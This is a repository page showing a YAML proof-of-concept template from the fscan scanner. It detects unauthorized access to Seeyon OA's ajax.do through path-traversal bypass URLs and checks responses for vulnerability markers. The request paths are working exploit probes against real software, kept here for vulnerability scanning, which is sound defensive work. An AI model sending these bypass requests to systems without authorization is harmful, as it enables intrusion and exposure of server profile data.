qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/WebScan/pocs/seeyon-ajax-unauthorized-ac...

17 lines
774 B
YAML
Raw Blame History

name: poc-yaml-seeyon-ajax-unauthorized-access
rules:
- method: GET
path: /seeyon/thirdpartyController.do.css/..;/ajax.do
expression: |
response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null"))
- method: GET
path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
expression: |
response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json")
detail:
author: x1n9Qi8
links:
- https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
- https://buaq.net/go-53721.html
Reference in New Issue View Git Blame Copy Permalink